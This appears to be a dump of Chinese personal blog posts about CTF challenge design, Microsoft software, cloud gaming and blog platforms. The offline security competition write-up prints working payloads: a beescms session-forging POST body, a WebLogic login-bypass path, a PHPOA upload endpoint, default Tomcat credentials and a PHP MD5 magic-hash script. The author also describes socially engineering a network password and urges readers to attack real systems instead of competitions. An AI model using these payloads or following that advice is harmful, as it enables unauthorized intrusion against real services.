"现在我终于把CTF的全流程都体验了一遍！起因去年，我们学校整了CTF，我作为协办方的一员组织了那场比赛，而今年又是一年一度的CTF比赛，这次我有了组织了经历就想换点别的，因为前段时间我还在线下打过CTF，相比去年有了更加丰富的经验，所以这次的比赛我就不维护平台了，而是试着去出题。出了什么题？说是有丰富的经验，但是实际上我又不是信息安全专业的，也没有专门去练过怎么打CTF，所以我实际上也不咋会出题😂。不过没关系，我前几次CTF也有解出来过题目，那就用他们的思路来出些题目吧！当然在CTF里还是得出点原创题，如果直接去抄别人的题还是非常不好的行为，毕竟对于这种情况搜到的人会感觉很没意思，而对于没搜到的人也很不公平，毕竟这不是搜索技能大赛。不过借鉴思路还是没有问题的，毕竟对于普通人来说还是得用普通思路解题。第一题所以第一题我缝合了两年前打过的CTF中一道叫Swedish State Archive的题目和前几个月打过的CTF中一道关于PHP判断MD5漏洞的一道题。在这个题中首先要绕过Python的那些条件，才能获得PHP的源码，而且我没有在git中直接提交flag，所以难度比那单个题目更难了，获得了PHP的源码之后就可以用那个MD5的漏洞来获得真正的flag了。总的来说难度还可以，毕竟这还是正常思路可以解决的问题。最终解出来的情况我也很满意，有12个队伍解出来了。第二题第一题既然用了别人的思路，第二题自然要自己整点有意思的题目。在我弃坑MaBBS之前，我在项目中发现了严重的安全漏洞，那就是我的程序在创建比如贴子之类的东西是直接用标题作为文件名的，而且我最开始的时候没有做任何的过滤。当时我首先写了一个叫做danw的函数来过滤有可能出问题的字符，但是我只给Wiki部分加了这个过滤函数。这是为啥呢？是因为我当时想把贴子整成ID的形式，然后把贴子的标题写到meta里面。可惜后来弃坑了就再也没有管这个问题，只留下一句只有上帝才能看得懂这个代码就结束了MaBBS。也许重建MaBBS的计划也再也没有机会完成了，毕竟失去了当时写程序的初心，现在也只是会写程序罢了……emmmm有点跑题了。总之既然有这样的漏洞，那我可以部署出来让我看看那些学信息安全的家伙到底是什么货色，看看是真的只会按着解题思路来解题还是真的有分析代码的能力。结果也不出我所料，果然全是一群废物，除了我曾经告诉过漏洞的人除外，没有一个人解出来。不过也正是因为我知道那个题有人可能知道答案，所以分数也不会定很高，不然我觉得这可能真的无人会解。第三题第二题可能太原创了，对于他们没有接触过实战的人来说不合适，所以第三题我和另外一个学信安的朋友一起出，这道题我们决定用APICloud他们公司的能力作为这道题难度的上限。APICloud有一个加密HTML源代码的功能，目前我们在网上没有搜到已经破解的方案。不过如果网上无人会破那作为出题者的我们自己也破不出来啊……毕竟这个题要是没有方案能解，那出题的意义就没有了，而且万一要我们自己写WriteUp的话那不就尴尬了。所以我们换了一个思路，用它加密本来就不考虑让其他人解密，但是我们在里面偷偷放一个可以调试的工具在里面，比如vConsole。然后给JS代码二次加密，使得解题者只有一条路可以走，那就是使用调试功能来干涉程序。这次我们写的是一个抽卡程序，目标是点够20亿次才能抽出来。所以这里我们可以直接用调试工具来修改点击次数来实现获得flag，其实也主要是我们自己不会才整的这种烂方案。不过这个也不算难，发现的人稍微想一想就能解出来，所以如果以后有机会，我还想再提高一个难度，不给vConsole，而是写一个请求比如https://example.com/hello.js，然后需要解题者劫持hello.js来实现修改变量，这样才更有意思，可惜这次出题没想到这一点，所以只能出个比较简单的。不过那群信安的家伙真的还是不行，这么简单的题居然只有一个队伍解出来，不过他能解出来我也觉得挺不错的，证明他的思维比较开阔，不那么局限。出题感受和其他这次CTF出题感觉还是挺有意思的，而且挖坑还要想到自己怎么填这个也对找坑很有帮助。毕竟大多数情况真正的环境漏洞不会按常规路走，能按常规路走的漏洞绝大多数情况都已经被人踏过了，所以思维要开阔，真正优秀的渗透工程师肯定是思路开阔，想法很独特，而目前那些学信安的就是一群思维固化，除了解题不懂得其他东西的家伙，以后找不到坑就等着背锅吧😂。   另外上个月末我还遇到一次很有意思的事情，有一个叫做萌国ICP备案的网站有个XSS漏洞，于是我和同在那个网站上的几个网友进行了一次XSS AWD大战，为了自己链接的特效而战，非常的有意思，可惜这个月初我生病了，没能记录下这有趣的事情，等我过两天再次想写博客时就分享一下这个有趣的事情吧！" },{ "title": "微软产品使用体验与感想", "category": "", "tags": "微软, 体验", "url": "/2021/10/23/microsoft.html", "date": "2021/10/23", "content": "感觉微软还是厉害啊……起因前段时间，微软发布了WSA（Windows Subsystem for Android™）Nightly版。之前Windows 11正式版刚出的时候我就对WSA很期待了，所以当时正式版刚出的时候我都等不到Windows Update给我推送了，直接去官网上下载镜像升级了。现在终于等到可以安装WSA的时候，我就立马从官网下载了安装包并且进行了安装体验。最终效果还是挺不错的，所以今天我打算把我用过的所有微软产品使用的经历谈一谈。Windows 11体验其实我对Windows 11本身不是很期待，因为看过效果之后感觉就好像只是改了改UI而已，整体使用体验似乎和Windows 10区别不大。除了那个右键菜单，感觉是真的越改越烂，那个东西好不好看其实都是次要的，关键是功能少而且描述也不清晰。比如任务栏右键就一个任务栏设置，正常人谁会在意那任务栏设置，把我任务管理器给整没了，要用鼠标打开任务管理器就只能右键⌈开始⌋菜单，不是很友好。另外右键文件的时候很多其他程序的选项被隐藏到了“显示更多选项”里面，我要是想用7-zip或者是Notepad++就要进行两步操作，非常的反人类。还有就是那个复制剪切粘贴以及重命名等操作，它就一个图标，一眼看过去半天反应不过来。我真的是无言以对，微软的UX设计师都被阿三吃了吗？    不过有些新增的功能还是挺不错的，虽然Windows本身有很多难以言说的地方，不过各种功能还是挺不错的。Power Automate Desktop安装了Windows 11之后它们会预装一个叫做Power Automate Desktop的软件。之前我在用Office 365 E5开发者试用订阅的时候有用过在线版的Microsoft Power Automate(以前称为 Microsoft Flow)，那个也挺有意思的，可以给自己订阅比如说天气预报或者是RSS新闻之类的，算是给非开发人员整的自动化软件吧，像正常的开发者貌似写代码还要比那个简单些。现在变成桌面端之后功能更强大了，用起来感觉有点像苹果的快捷指令，不过配合Windows的命令，能做的事情要比快捷指令要多很多。就光这一点，就足够吸引我同学升级Windows 11了，足以说明它的强大。Windows终端虽然说Windows终端在Windows 10的时候就可以从应用商店里下载了，不过现在它到Windows 11中成为了预装的软件。使用体验和各大Linux系统发行版的终端模拟器有点像，不过因为Windows的Shell种类繁多，功能也比一般的Linux发行版强大一些。从体验效果来说，虽然改动不大，但是已经算是很优秀了，至少比之前的cmd窗口要好很多。它支持的Shell除了Powershell和传统的cmd之外，还支持WSL和Azure Cloud Shell，尤其是Azure Cloud Shell，简直就相当于白嫖一台Linux系统的云电脑啊（虽然说它用到的Azure块存储理论上是要收一定费用的，不过我有学生认证所以无所谓）。Hyper-V我当年知道Windows 10有Hyper-V之后，就再也没有用过VMWare了。虽然说Hyper-V有些地方确实有缺陷，比如没办法连接USB设备，但是它的性能确确实实在几个桌面端虚拟机中是最好的（不算图形性能）。我之前在Hyper-V里面安装了Kali Linux，和使用VMWare以及VirtualBox的人一起比虚拟机的启动速度，基本上同等配置，或者更高配置下，Hyper-V都是速度最快的，足以证明它运行效率非常不错。不过也能理解，毕竟其他虚拟机都要通过Windows内核来访问虚拟化指令，而Hyper-V是直接由Windows内核访问那些指令的，速度自然会快很多。而且以我目前使用的经历来看，安装VMWare的人经常会出现莫名其妙的故障，比如使用虚拟机还能把物理机整蓝屏，就非常的离谱，Hyper-V我用这么长时间从来没有遇到过什么奇奇怪怪的问题，可以证明它的稳定性也非常不错。再加上Windows很多特性会使用Hyper-V，比如基于虚拟化的安全、WSL 2、Windows沙箱、容器、WSA等等，所以早日抛弃其他乱七八糟的虚拟机，一起使用Hyper-V吧。WSL（Windows Subsystem for Linux）在WSL出来之前，我也用过像Cygwin这样的Linux模拟环境，但是因为实际上并不能执行Linux程序，所以使用起来还是不太行，真正用的时候还是得用虚拟机。但是WSL出了之后就不一样了，它是通过底层对Linux执行文件进行转换，所以除了内核之外其他文件都是真正的Linux程序，用起来的效果也真的和Linux环境一模一样，而且占用内存极低，像直接打开Ubuntu仅占连10MiB都不到的内存，非常不错。   后来他们出了WSL 2，不过WSL 2就没内味了，因为WSL 2是虚拟机，虽然可以读写Windows的文件，但是既然是虚拟机，即使是用高端Hyper-V整的轻量级虚拟机，占用内存也要比WSL 1高很多，所以不太行，而且我也用不到什么namespace之类的高级功能，所以就一直使用WSL 1了。Windows沙箱说起Windows沙箱，我就不得不吹一波我发现了他们的漏洞。不过也正是因为这个漏洞，原本我对Windows沙箱是绝对信任的，现在我已经信任不了了。Windows沙箱是一个基于当前在使用的Windows系统文件使用Hyper-V轻量级虚拟机制作的一个环境，只是说用的话还是挺不错的，在里面进行任何操作只要关掉之后就不会留下任何痕迹，而且相比普通Hyper-V虚拟机好的一点就是它不占存储空间，启动速度非常快，毕竟它用的是当前系统的文件制作的。另外使用.wsb配置文件可以做到自动部署，以及使用外部摄像头、话筒、显卡等能力，这也是普通Hyper-V虚拟机好的一点。WSA（Windows Subsystem for Android™）这篇文章正是因为他们出了WSA才突然想写的，这也证明了我对WSA还是很满意的。我昨天用了一下WSA，安装了ES文件浏览器，本来我还觉得奇怪它的主界面在哪里，安装完成之后才发现这个软件已经到我的应用列表里面了。这时候我才意料到这才是子系统该做的事情。其他安卓模拟器再怎么做，也能感受到我用的是一个模拟器软件，而WSA给了我不同的感受，可以感受到似乎安卓程序真的跑在了Windows上面一样。首先在WSA中，输入法使用的是Windows的输入法，很多模拟器很难做到这一点，基本上他们都是使用的安卓系统内的输入法。第二是实时更改分辨率，当我调整WSA中程序的窗口大小，内容也会跟着一起变。目前我见到的安卓模拟器似乎都没有这个能力。从用户体验来说以上就做的很好。另外还有性能，因为和Windows沙箱一样也用的是Hyper-V虚拟机，CPU基本上和裸机直接装Android x86性能一样好，ARM兼容层看起来貌似和Android x86一样用的是Intel开发的Houdini，所以跑ARM软件应该也没什么问题。于是在我用了一小会WSA之后就把之前安装的Android x86虚拟机删掉了。很明显微软配的虚拟机比我自己配的好太多了。   不过目前因为还在测试阶段，目前WSA还不能调用独立显卡，如果要是玩游戏目前效果还是挺差的。具体要说用嘛，因为我现在电脑要是玩安卓游戏都用的是云游戏，所以虽然WSA确实非常不错，不过我可能只会用于开发/调试用途，玩游戏还是不会去用WSA。所以这个问题也能接受。OfficeOffice是我从小就在用的软件，从当年的2003版，一直到现在的Microsoft 365，想当年我刚接触计算机的时候用的就是PowerPoint，一直到现在，不过其实很多年以来更新的幅度并不是很大，除了在2007版的整体界面逻辑更新，以及2016版以后增加的几个特效确实不错，软件本身并没有特别大的变化。不过到了2016版之后出的Microsoft 365就不一样了，Microsoft 365从原本普通的软件升级成为了SaaS类型的云软件，到现在的效果就很不错。首先第一点就是把软件做成HTML5的形式，保证在任何地方都可以使用，另外就是模板和图标以及设计灵感的功能，这些基于云的功能用起来都效果很不错。另外要是说到云的话其实WPS可能更早一些，不过WPS那个体验是真的糟糕，垃圾的简直就是不能看，它唯一的优点可能就是方便吧，我一般如果给其他人安装Office可能就直接安装WPS了，一键就能完成，另外就是Linux系统中因为没有Microsoft Office，所以可能也就是Linux的WPS Office能勉强一用吧。Visual Studio Code如果说Visual Studio是宇宙最强IDE，那么Visual Studio Code就是宇宙最强编辑器。从开发的角度来说可能确实是这样。VSCode的扩展性，使用效果在编辑器里都是相当强的，又因为使用的是Electron框架编写，所以也有着很强的跨平台性。另外插件也非常多，插件开发难度低（JS开发已经很简单了），所以使用效果很不错。可惜我并不看重它的跨平台性，如果说我在其他电脑上做开发可能会使用VSCode，而我自己的电脑坚决不会用。因为我不喜欢一个软件就套一个浏览器，安卓做这活已经让我很难受了，我不允许我的电脑上也出现同样的问题。如果说Electron能做成像WebView那种感觉那我觉得可以，但是现在就是垃圾，所以我只用Notepad++。如果有人因为Notepad++作者有啥问题让我别用，那我只能说赶紧爬，我不确定这种人是有什么毛病，至少这个作者没有往这个编辑器里面加病毒或者是什么挖矿工具之类的私货，至少人家作者人品没问题，具体观念那是人家自己的事情，骂这个作品的人肯定脑子有问题。GitHubGitHub我不知道算不算微软的产品，不过既然已经被收购了应该算吧。总的来说，我感觉在git的代码托管平台之中，没有哪一家能和GitHub相比。GitHub的各个方面，无论是知名度还是功能上来说都算是全球领先吧。Github Pages我的博客就是在Github Pages上的，从易用性来说似乎甚至没有什么可替代品。Github ActionsGithub Actions也挺好用的，算是很良心的CI/CD平台了吧，使用的服务器性能也很强，可惜这种服务很容易被滥用，之前也有人拿它挖矿，以至于现在除非项目很出名，不然用的多了就有可能会被判滥用。Github Web Editor最近GitHub使用VSCode搭了一个很有意思的东西，在仓库里按“.”就可以进入，在这里面可以用VSCode在线编辑仓库里面的文件，而且在线就能直接提交，非常的方便。不过也有些问题，比如说能装的插件很少，甚至连中文插件都不能装……另外我也不能用它写博客，因为我的博客为了安全开了分支保护，必须用签名的方式提交，不过目前来看貌似这个VSCode并没有签名，所以不是很完善。另外就是Codespaces，不过这个我感觉不太行，因为使用起来code-server就足够好了，只要手头有服务器就可以整，Codespaces还是不太行，没有足够的吸引力。Github Education因为我还是学生，前段时间我在Github上完成了学生认证。不得不说Github是真的良心，只要完成了学生认证，有大把大把的资源都会送，像什么服务器、域名、各种各样的会员、专业版的软件一律免费。不过准确来说应该是微软良心，像这些活动应该都是微软搞的。我现在领的东西大概有4个1年的免费域名购买权限、2台免费的低配服务器、1年JetBrains免费全家桶订阅、Github Pro等等，其他乱七八糟的我也不是很清楚干嘛用的，总之就一句话，良心啊。Azure正是在上面Github完成了学生认证，所以我也可以免费使用学生版的Azure订阅。之前我们学校有老师带我们参加AWS的比赛，所以也有用过AWS。不过目前我用起来感觉Azure更加人性化一点，AWS一堆自创的专有名词还要别人去学，那东西真的给我整麻了。通过了学生认证之后就会有100USD的免费使用额度，不过一般来说正常使用甚至都用不到这个额度，B1s的虚拟机（1h1g）+P6的硬盘（64g）可以搭Linux和Windows各一台，还能整10个免费的容器或者虚拟空间，以及B1ms的MySQL和PostgreSQL服务器各一台，另外更有一堆AI接口不过我不会用所以就算了。光这些东西基本上是干啥都够用了，到最后一个月还可以一把开个超大服务器爽一把，不过其实Azure是按秒计费的，所以如果有大量计算需求的也可以随用随开，虽然我感觉没有能用上的地方……其实Azure限制最大的还是在出站流量上面，一个月只能免费用15GiB，当普通的服务器倒是够用，但是当梯子就有点困难了。   像Azure送的两台服务器，对我作用还是挺大的，我现在在上面就开了1个Jupyter用于学习机器学习，1个code-server，还有Django开发环境，PHP开发环境，另外还有帮同学维护的博客。这服务器承载的东西还是蛮多的，我上课的东西都在上面了。这样我就不需要在电脑上安装这堆乱七八糟的环境，等服务器到期我也就结课了，这样环境就随着服务器一起消失，我就不需要再考虑清理电脑的痛苦了。总结无论微软怎么样，它都确确实实的提升了我们生活的质量，制作的东西也很有意思，而且相比于其他公司，已经算是很良心了（至少比国内那些大公司良心）。也许微软在某些小地方做了错误的决定，但是总的来说，还是希望他们能做出更好的产品，用更好的技术带领科技的发展。" },{ "title": "云游戏的体验与感受", "category": "", "tags": "云游戏, 体验", "url": "/2021/09/28/cloudgame.html", "date": "2021/09/28", "content": "基础设施才是最重要的！起因前段时间，米哈游出了《云·原神》的游戏。当时《原神》出的时候我就去试着玩了玩，不过被过于难的游戏主线剧情给劝退了，我打原神也只是对它的剧情和画面比较感兴趣。一年之后他们出了云游戏，其实我对云类型的东西还是挺感兴趣的，以前也写过关于云手机和相关的策划 （虽然策划是同学帮着写的😂） 。因为我也觉得买很好的电子产品大多时候都是闲置的，利用率很低，通过云的管理方式可以降低成本和提高利用率。可惜我当时也只是因为体验了远程桌面才想着整云手机，并没有真正的体验一下，所以《云·原神》出的时候我就去抢名额了，结果没抢上😂，不过后来他们放宽了名额，我才真正的体验了这个所谓的云游戏。《云·原神》的体验说实话效果还是挺不错的，首先云游戏最大的好处就是客户端很小，不需要下载很多东西，基本上可以做到即开即用，第一感觉很不错。接下来延迟的效果基本上和手机版的原神几乎一样，而且特效更好。不过因为宿舍带宽不太行，所以只是全特效，而不是高清。所以当天得到资格之后我就开始疯狂肝剧情，从打“公子”一路肝到刚前往稻妻。总体体验让我对云游戏产生了信心。不过《云·原神》是限时的，第一次登录会送5个小时的游玩时间，之后每天登录可以送15分钟，最高可以累计5个小时。所以以我的肝法，很快免费的游玩时间被我用光了。体验效果确实不错，但是问题在于手机端打原神真的很难受，即使效果不错，延迟很低，但是原生的原神在手机端的体验也很差劲，所以我在用完时间以后又开始体验新的云游戏平台。网易云游戏的体验我在体验《云·原神》的过程中有时候也会看其他人对云游戏的体验，我发现很多人会拿《云·原神》和网易云游戏做对比，说米哈游还没网易良心，一天15分钟的时间啥都干不了（充钱？我游戏都不充钱，这个东西更不可能了）。所以我就试了试网易云游戏平台。   之后我就去搜网易云游戏，发现他们很良心的一点就是允许直接使用浏览器就能玩，不需要下载客户端，这也就是说可以不限平台，假如我用ChromeBook也能随时感受到完整的电脑游戏体验，而且如果花钱的话价格还行，一小时最贵大概两块钱，如果是玩手机游戏就更便宜了，包月是一天一块钱。如果啥时候《云·原神》有电脑版，那一天两块钱的价格好像还行，只有手机版除了特效和一些体验还不如网易好，最起码网易是所有手游都能玩。   所以最近几天我都在网易云游戏上体验，肝了三天把主线剧情打完了，然后继续打支线。不过玩过原神的人应该知道，原神有些支线任务很阴间，不好好天天肝或者氪金整人物好多任务都很难打。我昨天打“山中之物”的支线剧情时人给我打傻了，关卡难也就算了，正好当时同宿舍的人在看视频，我随便一打，延迟直接往1000ms上增，而且基本上只有画面动的多的时候才会上升。画质我已经调到最低了，但是根本玩不成，一波给我气傻了，于是没办法，我只好放弃，从此直到原神新的主线剧情出来我应该是不会再去碰它了。（不好说，闲了我可能会去打传说任务）对于云游戏的展望在这次体验中，可以感受到云游戏的很多优势，我买1000块钱的笔记本电脑就可以享受和5000块钱的电脑相同的游戏体验，价格便宜很多，当然前提是网络很好。主要是可以用时收费，不像普通的电脑不用它已经花出去的钱也就那样，而且还会贬值。第二是即开即用，我可以不用下游戏，就和去网吧一样，想玩的游戏已经提前装好了，无论想玩哪一款游戏点开就能玩，很方便。第三就是多客户端，我在手机上正在进行的游戏随时可以无缝切换到电脑上面，可以让用户无论在手机、电脑、平板都能体验到相同的游戏效果。   不过缺点也非常的明显，那就是网络真的是太痛苦了，网不好真的是没法玩，所以对于网络的优化无论是网络运营商还是云游戏服务商都需要付出足够的努力。不过目前来看，中国千兆普及率还是很低的，5G？5G就是个笑话，它能比光纤快？5G与互联网的连接都还是光纤呢。WiFi6不比它强？主要是5G覆盖率太低了，而且体验真的和4G没什么区别。所以以目前的网络水平，我暂时不看好云游戏。我不知道未来的网络能发展成什么样，能不能真正承载住极低的延迟和大量的数据。不过基本上大多数游戏只要延迟在100ms以内，人基本上都能接受，所以这其实不是技术难题，而是经济问题。只要什么时候千兆可以完全普及，我相信云游戏会很有前景的。奇思妙想这正好让我联想到了PCDN，如果什么时候能出个PCC（P2P Cloud Computer），让附近闲置的高性能电脑给其他云游戏玩家做服务然后赚点小钱，想想也是个不错的选择呢。这样也能在一定程度上可以降低成本而且可以降低延迟吧，毕竟租机房还是挺贵的。" },{ "title": "记一次线下的信息安全比赛", "category": "", "tags": "CTF, 渗透, 信息安全", "url": "/2021/09/06/offlinectf.html", "date": "2021/09/06", "content": "感觉还是现实中的渗透有意思……起因近些年来，我体验过线上的CTF，也体验过成为CTF的举办方，但是由于各种各样的原因，我没有参加过线下的这种信息安全比赛。正好最近四川某学校组织了一场线下的信息安全比赛，我们学校就让我和同学们去参加了。   在我们的队伍中，除了我之外，其他人都是信息安全专业的，这让我这个网络工程的人怎么办😂。不过好歹我还发现过漏洞，自制过网站引擎，也在维护网站的过程中对网络攻防有一定的了解，加上上面的经验，至少我在知识面上还是能和信息安全专业的人比较的吧。体验与过程在这次比赛中有两部分的内容，第一部分是CTF，第二部分是内网渗透。除此之外线下和线上的区别有一点就是每个队伍会单独给靶机，听说Flag好像有些题也是唯一的。另外有一个挺大的区别就是线下的电脑不允许联网，包括手机信号也会屏蔽。不过据说貌似屏蔽的只有4G以下的信号和2.4G的WiFi信号与蓝牙信号，5G移动网络和5GWiFi并没有受到影响，另外也提供一台可联网的电脑可以限时查资料。所以这整的我就有点看不懂这个操作了。另外我通过社工的办法偷偷的整到了他们校园网的密码，所以其实我可以正常连接到互联网。CTF部分虽然我玩过CTF，但是实际上我对CTF还是一窍不通，Crypto部分的题看不懂，也不知道用什么工具，Misc题简直就是感觉能做可惜工具不够。Web题还好，至少会一点但是我还是不会SQL注入。其他什么Pwn会用Reverse之类的题就基本上和我们无缘了，反正我们小组的人都不会，另外也没工具。   其实说实话我到现在为止，都看不出来CTF在现实生活中有什么用，逆向和Web可能有点用，Crypto这种来个正常点的AES加密能有人不靠暴力破解？还有Misc那种是在考验什么？脑筋急转弯吗？我原创个加密算法就是有漏洞能有人会解？   总之CTF感觉其实意思不大，不过说是那么说呢，我也还是分享些我能做出来然后有点意思的题吧。   在这次的Web题里面有一个挺有意思的就是MD5和它自身相等的一个题。不过目前貌似以人类的科技还没有找出这样的值。大概代码就是这样：<?phpinclude 'flag.php';highlight_file(\"index.php\");if(isset($_GET[\"a\"])){  $a = $_GET[\"a\"];  if($a == md5($a)){    echo $flag;  }}虽然和原题不太一样，不过大概意思就是这个意思。我看到之后最先想到的就是去百度找有没有这样的值，不过最后似乎发现人类还没找到。接下来我就去搜php中MD5常见的漏洞，最终发现就是在使用“==”判断的时候如果说后面的md5是“0e+一串数字”，PHP就会认为它是0。我本来想找0e开头的md5也为0e的，但是垃圾百度怎么找都只会找到像“QNKCDZO”这种垃圾值。那算了，反正知道原理了我就直接自己写一个脚本算吧，脚本内容如下：from hashlib import md5for i in range(1,999999999):    a = md5((\"0e\"+str(i)).encode()).hexdigest()    if a[0:2] == \"0e\":        try:            int(a[2:])            print(i)        except:            aaa = 0因为时间比较紧张，所以就随便写了一下，反正能用就行。最终算出来第一个值是“0e215962017”，然后就可以了，因为它的md5是“0e291242476940776845150308577824”，对于PHP来说相当于“0 = 0”。垃圾百度真的是除非直接搜这个值才能出现少量的结果，其他真的是怎么都搜不到……   其他题我都不会做，CTF就到这里吧。内网渗透部分内网渗透相比CTF来说还是有点意思，尤其对我这种网络工程的人来说至少各种连接还是比较容易的。而且其实吧我也是在现实中玩过渗透的，像学校网络都比比赛中的网络渗透起来简单。另外我也写过任意连接两个网络的文章，所以这一部分我做起来就会更加得心应手一些。   不过通过这次比赛，我还是发现比赛本身并没有多大意义，比如说我们比赛的时候进入的入口是一个叫做beescms的CMS，然而比赛举办方也不给代码，让我们盲猜，这倒也不是不行，在这个CMS的很多地方都能看到有可能会被SQL注入的点，然而我们队伍用了很多办法试都失败了。最后才在百度上找到一篇文章说可以直接在主页POST一串：_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999这样的东西就可以直接修改Session绕过登录😓……我TM这东西不审计能找到这种漏洞？最终才成功在上面找到了4个flag然后进入下一个内网。   在下一个内网里面有两个MySQL数据库和一个Tomcat网站，另外还有一个网站上面写着后台管理但是看不出来是什么框架的。根据提示说那个Tomcat和数据库都是弱口令，最后猜出来Tomcat的用户名是“tomcat”，密码是“tomcat123”。数据库有个问题是我们能成功登录，但是相关的工具不知道咋回事连不上代理……我因为不是信息安全的所以没有什么工具，那个有工具的全局代理坏掉了，不知道为啥连不上……所以没办法……另外那个数据库进去之后竟然也不给个flag也真是够小气的，估计flag是在文件系统里面吧，听说用UDF提权就可以。Tomcat是进入第二层网络的跳板，我在上面搭了两层代理之后就可以进去那个网络了。在那个网络中有一个PHPOA的系统、一个Weblogic的网站和一个应该是Windows7的系统。 看起来只开了SMB的端口，感觉好像应该是用永恒之蓝打……（听大佬说好像是用IPC$？）不过具体的因为队友的工具连不上……所以就没办法。   PHPOA的那个资料不多，不过我还是通过百度搜到了相关资料说/ntko/upLoadOfficeFile.php这个路径有个任意文件上传的漏洞，我人麻了，这不给代码不给网络我难不成靠先知知道这个漏洞？   Weblogic那个网上虽然搜到了教程，说可以用/console/css/%252e%252e%252fconsole.portal这个地址直接跳过登录，但是我没怎么用过那个平台不知道怎么部署也不知道怎么改密码所以最后也失败了……   到最后成绩还不错，做了6道题，给了1k多分，还拿了一个一血和二血。总结最后比赛结束成绩还可以，我们队拿了个三等奖。不过这次比赛之后我发现还是在现实中去破解个认证啊啥的比CTF有用多了，去真实的环境搞渗透比在比赛中有意思多了，所以真想玩就在现实中玩吧。当然对于这次机会我感觉也是有意思的，通过Flag的方式在一定程度上来说能给我带来些乐趣，也是挺不错的经历了。" },{ "title": "如何选择合适的博客平台", "category": "", "tags": "博客", "url": "/2021/08/15/blog.html", "date": "2021/08/15", "content": "记录，也有很多种方式。起因我建立这个博客也有3年左右的时间了，为什么现在会想写这样的文章呢？主要是现在各种各样神奇的服务和概念出现，不得不让我仔细分析其中的奥秘，而且在这几年我也有了一定的成长，也发现了很多有趣的东西，另外最主要的是我想实现Mayx Forever计划，所以研究一下不同平台之间的差别。不同博客的特点作为博客，它的本质也不过是一个用来记录和展示自己写的文章的程序。另外从作者来说，一般也分为平台托管、动态网站和静态网站三种。所以今天我就从这三点来分析一下。1、平台托管平台托管即没有程序的所有权，仅有平台提供功能的使用权。这也就是说数据库、处理程序和界面通常都是由平台提供，博主几乎没有修改它们的权力，这也说明博主在这里几乎除了写文章之外什么也做不了。不过有些博客平台会提供界面的修改权，一种是仅能从有限的模板中选择，另外一种就是允许博主自己写CSS和JS来操作界面，这种自由性更高，不过因为这样通常比较危险，大多数博客平台是不提供这种功能的。   这种博客对不太懂计算机，或者只想写文章的人比较友好，基本上只需要注册账号，平台就允许你写文章并发布了，而且一般都有自带的评论系统，良好的文章编辑器，大多数都免费，相对还是很友好的。比较常见的有Blogspot(Google Blogger)、WordPress.com、FC2、博客园、QQ空间、微信公众平台、Bilibili专栏、CSDN等等。从自由度来说，在这些平台中有些是允许自定义域名的，这种算是比较良心的平台，另外也有花钱就能自定义域名的，可惜中国的平台均不支持自定义域名，另外国内的平台均有非常严格的审查，平台可以随意的处置你的文章，不过国外的好多博客平台都被中国防火长城拦截了，没办法用。当然也不是说国外的博客没有审查，大多数情况只要你不写对恐怖分子可能造成帮助的、带有儿童色情的、或者违反DMCA的，基本上平台都是不会管的。   所以从此来看，如果是懒得自己搭平台、不会搭、不想花钱、又希望国内的用户可以看到，还觉得自己写的文章能接受国内的审查，我个人建议使用博客园，博客园允许博主修改界面，相对来说比较自由一些。不过之前博客园炸过一次，我现在不是很相信他们了。所以如果想保留的更久一些，可能微信公众平台会更好一些，毕竟微信也算中国的国民级应用，一般来说很难倒闭。   如果不能接受审查，又希望能在中国访问，这个难度就比较大，WordPress.com这个可以碰碰运气，但是它有广告，不太推荐。不过基本上是做不到，毕竟国内平台必有审查，国外平台没有审查大多数情况都会有国内不能接受的东西，然后就会被Ban。所以平台也就是有这个缺陷，它的限制比较多。   如果不考虑国内访问的话，我觉得Blogspot是最好的选择，同样可以自定义界面，另外Google作为网络巨头来说也很难倒闭，所以如果追求稳定的话我觉得选择Blogspot是很不错的。平台托管的网站示例我之所以写这篇文章也是因为试着用了好多平台，以下都是我注册的博客，如果有必要的话说不定我也会用它们：  https://unmayx.blogspot.com/  https://unmayx.blog.fc2blog.us/  https://unmayx.wordpress.com/  https://mayx.cnblogs.com/2、动态网站动态网站即界面是由程序根据数据库的内容实时生成，而且通常有一定交互性的网站。一般这种的博客都是脱离了平台的，所以这种算是独立博客了（静态博客也是）。这种博客一般数据库、程序和界面博主都有完全的所有权，所以自由度更大，而且因为程序在手中，所以想加功能也是非常简单的，比如加一个讨论或者爬虫的功能一般只需要安装插件就可以完成。又因为数据库也在手中，所以也不需要担心文章被删除的问题。既然这么好那么问题在哪里呢？那就是一般要花钱。建立动态网站通常需要服务器和域名，目前大多数的服务器和域名都不是免费的，所以动态博客有成本，在三种方案里是最贵的。   不过平台托管其实也是动态网站，为什么它就可以免费呢？其实原因很简单，首先是边缘成本的问题，租一台服务器是很贵，但是如果十个人共用这一台服务器就会便宜很多，又因为平台托管下的文章实际上是属于平台的，所以其实这波平台得到的更多，毕竟只需要租几台服务器，搭一个平台就能获得一大堆免费的劳动力在自己的平台上写文章。要知道杂志收录文章都是要花钱的，博客平台就光提供了个平台就把广告费、推广费啥的赚上了。   所以从这一点来看的话，为了保证自己文章的安全，自己搭博客更好，假如做的好，自己打广告钱也都是进的自己的口袋，这有点像小商店和电商的感觉了。不过大多数人写博客也不是为了赚钱，像我也不是为了赚钱写博客，到现在我写了几十篇文章也没人给我打赏😂。   目前来看大多数的博客引擎都是PHP或者Node.js写的，因为它们的性能很好而且扩展性很强。像全世界最流行的博客引擎WordPress就是PHP编写的。这里的WordPress和上面的WordPress.com平台不一样，这里的WordPress是开源软件，可以自己使用的一个引擎。像新手用WordPress就是一个很好的选择，它的功能很强大，操作起来也很简单，除了第一次部署PHP环境可能比较麻烦，剩下的写文章、换模板、装插件全部都可以在网页中直接操作，非常方便。另外也有很多PHP环境的虚拟空间，如果自己不想租服务器也可以直接租虚拟空间，这样也会更加便宜，操作也更简单。实际上也有些免费的PHP虚拟空间，不过现在是越来越少了，我用的几个都要消失不见了。Node.js的话倒是由于最近比较火，免费的还挺多，比如Glitch.me和CloudFlare Workers，另外Workers准确来说其实是云函数，算在Serverless里。另外我个人非常不赞同使用编译型语言写的博客引擎，比如Golang写的，这种的博客可扩展性非常差，而且性能怎么样也比不上静态网站，毕竟就算不考虑处理速度，Golang写的博客引擎能比C写的Nginx性能强？   